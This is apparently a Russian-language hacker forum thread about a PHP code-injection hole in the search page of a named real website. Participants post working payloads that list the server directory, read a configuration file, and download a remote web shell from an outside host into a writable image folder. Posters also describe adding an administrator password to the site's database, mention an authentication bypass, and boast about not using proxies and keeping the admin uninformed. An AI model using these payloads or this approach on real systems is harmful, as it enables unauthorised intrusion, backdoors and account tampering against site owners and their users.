Есть сайт с сабжем. На нем есть такая дырень: Есть поиск, и когда выдаются его результаты, то в начале еще и выводится "Вы искали". Выводится странным образом. Если я пишу в строке поиска <?php phpinfo();?> то выводится ожидаемый результат . Но стоит мне начать писАть кавычки, то скрипт отваливается с ошибкой.
Первый раз слышу чтобы вводишь в поиск <?php phpinfo();?> и получаешь phpinfo()... Не должнобыть такого. Показывай сайт.
Сайт: http://a-count.ru/ Поиск: http://a-count.ru/search Если в строке поиска ввести <?php phpinfo();?> То имеем Но, что-то сейчас у меня сайт не открывается. Видимо, "Билли! Тут кто-то побывал до нас!" (с) Пы.Сы. Все же не нужно админу говорить про дыру И еще: мне хочется понять, ЧТО дальше делать... В каком направлении рыть, так сказать...
Хо хо... Поздравляю =) Ты нашел дыру в некой // CMS Master :: Content management system // File: /cms-config.php // Version: 1.0 // Created date: 28 September 2003 // Modification date: 28 September 2003 пока еще не смотрел че за дыра, но скорей всего либо поиск через кривую регулярку он юзает, либо через какуюнить системную функцию. Короче. Ввел в поиск: <?$dir=\'./\';$dir=substr($dir,0,strlen($dir)-1);if ($handle = opendir($dir)) {while (false !== ($file = readdir($handle))) {echo \"$file\n\";} closedir($handle);} ?> получил листинг дириктории. Заметил файл cms-config.php, проглядел его. Вбил в поиск: <?$file=\'cms-config.php\';$file=substr($file,0,strlen($file)-1);readfile($file);?> Там каталог cms-images. Не факт, но обычно такие каталоги имеют права на запись. Решил попробовать туда кинуть ченить, шелл например. Вбиваю: <?$f1=\'http://www.zerkalodeface.narod.ru/rem.php3\';$f2=\'./cms-images/rem.php\';$f1=substr($f1,0,strlen($f1)-1);$f2=substr($f2,0,strlen($f2)-1);copy($f1,$f2);?> Ну и шелл соответственно по адресу http://a-count.ru/cms-images/rem.php?c=t Все, дальше сам. А я пойду погляжу в чем, собственно, дырка.
Блин впадлу дыру искать, замудрёееая система какая-то =) Спать лучше пойду. Если надумаешь постить дыру куданить типа на securitylab.ru, ни в коем случае мой ник не упоминай =) и вообще забудь что я это сделал =)
Trinux Слушай, ты как там админа добавил? В базу добавил логин и пароль или изменил существующий? Я почему спрашиваю?- Сам пока зайти не могу (по каким-то причинам ), да и неохота там что-то ломать (цель моих поисков не вандализм, а самообразование, но доказать это органам, думаю, будет тяжело,- первый шаг поиска делал не надев прокси). Пы.Сы. Очень прошу- не нужно там админу настроение портить: Я заинтересован в том, чтобы он как можно больше дырявых сайтов написал
пасс я добавил а не заменил. Уже не настолько дурак, чтобы менять =))) Админку ковырять не буду, делать чтоль более нечего. А я тоже без прокся делал. Только вотпусть попробуют найти =) Да и не в этом дело. Итак, что там было с кавычкой. А было следующее. Ковычка интерпритировалась как конец какого-то вырожения, насколько я понял. Поэтому мы ее экранируем (\'). Тут возникла еще одна запара. Почему-то вторую входящую экранированную ковычку он воспринимает так, как она есть, т.е. вместе со слешем, но без него опять ругается на кавычку. Поэтому пришлось сначало присваивать переменной значение со слешом, а потом обрезать последний символ переменной. На серваке Safe_mode в оне и много еще всяких наваротов. даже непонятно, толи действительно грамотный админ сервера, толи просто начитавшийся крутых статей малолетка =) Вроде так. Если где ошибаюсь - поправляйте. Кстати, разбираться где бага нет времени, но очень интересно. если у кого есть время и возможность - гляньте плиз и киньте сюда...
Ох, товарищи, не трогайте вы юродивых... Я дал адрес сайта но не думал, что там будут так откровенно глумиться над ними... И еще раз добавлю: В моих интересах, чтобы он(автор сайта) написал еще больше своих продуктов. А так вы ему слишком рано указываете на ошибку... (Сорри за оффтоп)
Kez, помойму там все же не регулярка, помойму там просто shell_exec неправильно немного юзается. Хотя может я и ошибаюсь. Скрипты я снес и пасс наадминку смени. Кстати там еще одна дыра в авторизации к админке. Можно пройти не зная логина и пасса. Вообщем очень интересный сайт =) Прям книга уязвимостей =) Думаю будет интересен новичкам.